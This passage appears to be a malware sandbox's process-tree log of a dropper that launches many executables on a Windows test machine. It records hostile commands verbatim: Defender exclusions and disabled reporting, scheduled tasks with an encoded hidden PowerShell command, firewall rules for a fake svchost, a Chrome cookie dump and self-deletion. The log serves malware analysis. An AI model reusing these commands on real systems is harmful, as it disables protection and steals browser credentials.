PID:4980 -
C:\Users\Admin\AppData\Local\Temp\7zSBD0D.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵PID:1928
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵PID:5340
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵PID:6056
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:5524
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵PID:5264
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵PID:1676
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵PID:5188
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵PID:2332
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵PID:5884
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵PID:2032
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵PID:1784
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gbPcfYwfQ" /SC once /ST 02:55:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
PID:5920
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gbPcfYwfQ"9⤵PID:32
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\UNzIX8HBMNPNIWrpHYMyJ6ER.exe"C:\Users\Admin\Pictures\Adobe Films\UNzIX8HBMNPNIWrpHYMyJ6ER.exe"6⤵PID:1620
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:2728
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:6100
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Avk2EJbFUsCIGK5bsZwiZYCd.exe"C:\Users\Admin\Pictures\Adobe Films\Avk2EJbFUsCIGK5bsZwiZYCd.exe"6⤵PID:3840
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\7⤵PID:4484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath \\?\C:\Windows \7⤵PID:5396
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:5792
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal7⤵PID:2156
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM7⤵
- Creates scheduled task(s)
PID:5900
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes7⤵PID:5348
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gESi6jZe4XXubaqPsnZBzWnB.exe"C:\Users\Admin\Pictures\Adobe Films\gESi6jZe4XXubaqPsnZBzWnB.exe"6⤵PID:4940
-
-
C:\Users\Admin\Pictures\Adobe Films\Y34pZCu0tloDrEzADK1GfR0B.exe"C:\Users\Admin\Pictures\Adobe Films\Y34pZCu0tloDrEzADK1GfR0B.exe"6⤵PID:4544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4544 -s 1247⤵
- Program crash
PID:2480
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mL_OP84SRxNpVqtwErqce4eu.exe"C:\Users\Admin\Pictures\Adobe Films\mL_OP84SRxNpVqtwErqce4eu.exe"6⤵PID:3200
-
-
C:\Users\Admin\Pictures\Adobe Films\wVrl_RNkDhDjjzFBnSphJP3Q.exe"C:\Users\Admin\Pictures\Adobe Films\wVrl_RNkDhDjjzFBnSphJP3Q.exe"6⤵PID:4252
-
-
C:\Users\Admin\Pictures\Adobe Films\A6jOeaLH4C4GdpYuyL71mml1.exe"C:\Users\Admin\Pictures\Adobe Films\A6jOeaLH4C4GdpYuyL71mml1.exe"6⤵PID:4600
-
-
C:\Users\Admin\Pictures\Adobe Films\2OlzyWgRpkMlYDzuqkjfiqtu.exe"C:\Users\Admin\Pictures\Adobe Films\2OlzyWgRpkMlYDzuqkjfiqtu.exe"6⤵PID:4476
-
C:\Users\Admin\Pictures\Adobe Films\2OlzyWgRpkMlYDzuqkjfiqtu.exe"C:\Users\Admin\Pictures\Adobe Films\2OlzyWgRpkMlYDzuqkjfiqtu.exe" -u7⤵PID:5640
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat123037f78f205c.exe4⤵
- Suspicious use of WriteProcessMemory
PID:588 -
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat123037f78f205c.exeSat123037f78f205c.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1912 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵PID:1680
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
PID:4264
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat128942fc3c9a4e75.exe4⤵
- Suspicious use of WriteProcessMemory
PID:780 -
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat128942fc3c9a4e75.exeSat128942fc3c9a4e75.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1876 -
C:\Users\Admin\AppData\Local\c8418d7b-b6c4-4659-b441-07aac87c585e.exe"C:\Users\Admin\AppData\Local\c8418d7b-b6c4-4659-b441-07aac87c585e.exe"6⤵
- Executes dropped EXE
PID:3212
-
-
C:\Users\Admin\AppData\Local\82479f0a-b741-43b9-b53a-c3bb2ed58093.exe"C:\Users\Admin\AppData\Local\82479f0a-b741-43b9-b53a-c3bb2ed58093.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
PID:4244 -
C:\Users\Admin\AppData\Roaming\57308631\5207433252074332.exe"C:\Users\Admin\AppData\Roaming\57308631\5207433252074332.exe"7⤵
- Executes dropped EXE
PID:5116
-
-
-
C:\Users\Admin\AppData\Local\51bda4e0-9596-4be7-9c5f-e572e49e6715.exe"C:\Users\Admin\AppData\Local\51bda4e0-9596-4be7-9c5f-e572e49e6715.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:3772
-
-
C:\Users\Admin\AppData\Local\c134ee86-6bbb-4bdb-a875-483c4d842708.exe"C:\Users\Admin\AppData\Local\c134ee86-6bbb-4bdb-a875-483c4d842708.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3956
-
-
C:\Users\Admin\AppData\Local\3d6b2b16-1850-4c63-bc54-1df3e7a2977a.exe"C:\Users\Admin\AppData\Local\3d6b2b16-1850-4c63-bc54-1df3e7a2977a.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4568 -
C:\Users\Admin\AppData\Roaming\4898359.exe"C:\Users\Admin\AppData\Roaming\4898359.exe"7⤵PID:3048
-
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",8⤵PID:5040
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\5wSR6.cPL",9⤵PID:508
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1266d17883454b1.exe4⤵
- Suspicious use of WriteProcessMemory
PID:912 -
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1266d17883454b1.exeSat1266d17883454b1.exe5⤵
- Executes dropped EXE
PID:1492 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Sat1266d17883454b1.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1266d17883454b1.exe" & del C:\ProgramData\*.dll & exit6⤵PID:3340
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Sat1266d17883454b1.exe /f7⤵
- Kills process with taskkill
PID:1300
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1283d3fd9a.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1283d3fd9a.exeSat1283d3fd9a.exe5⤵
- Executes dropped EXE
PID:2084 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:2984
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:4592
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat12faf3464bdfb3c.exe4⤵PID:1208
-
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12faf3464bdfb3c.exeSat12faf3464bdfb3c.exe5⤵
- Executes dropped EXE
PID:2724 -
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12faf3464bdfb3c.exe"C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12faf3464bdfb3c.exe" -u6⤵
- Executes dropped EXE
PID:3208
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1296f0ebf057bb0b.exe4⤵PID:1360
-
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat1296f0ebf057bb0b.exeSat1296f0ebf057bb0b.exe5⤵
- Executes dropped EXE
PID:3264
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat125bf3a6108a6f5e.exe4⤵PID:2384
-
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat125bf3a6108a6f5e.exeSat125bf3a6108a6f5e.exe5⤵
- Executes dropped EXE
PID:4184 -
C:\Windows\SysWOW64\regsvr32.exe"C:\Windows\System32\regsvr32.exe" /U QHCb.Lp0 /s6⤵
- Loads dropped DLL
PID:4692
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat127b52b8f420b.exe4⤵PID:1784
-
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat127b52b8f420b.exeSat127b52b8f420b.exe5⤵
- Executes dropped EXE
- Modifies registry class
PID:2876 -
C:\Windows\SysWOW64\control.exe"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\Dhz0.cpl",6⤵PID:2108
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\Dhz0.cpl",7⤵
- Loads dropped DLL
PID:4552
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat126518fd66e0120.exe4⤵PID:1616
-
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat126518fd66e0120.exeSat126518fd66e0120.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4748
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat12b734b9ff65fd19.exe4⤵PID:2748
-
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12b734b9ff65fd19.exeSat12b734b9ff65fd19.exe5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
PID:4980
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat12d67b11255d.exe4⤵PID:3840
-
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12d67b11255d.exeSat12d67b11255d.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4216 -
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12d67b11255d.exeC:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12d67b11255d.exe6⤵PID:3128
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12d67b11255d.exeC:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12d67b11255d.exe6⤵PID:1944
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat12285b225fb.exe /mixtwo4⤵PID:1916
-
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12285b225fb.exeSat12285b225fb.exe /mixtwo5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:1964 -
C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12285b225fb.exeSat12285b225fb.exe /mixtwo6⤵
- Executes dropped EXE
PID:1572 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "Sat12285b225fb.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zSCD050576\Sat12285b225fb.exe" & exit7⤵PID:2040
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "Sat12285b225fb.exe" /f8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3856
-
-
-
-
-
-
-
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:2344 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵PID:4652
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService1⤵PID:4316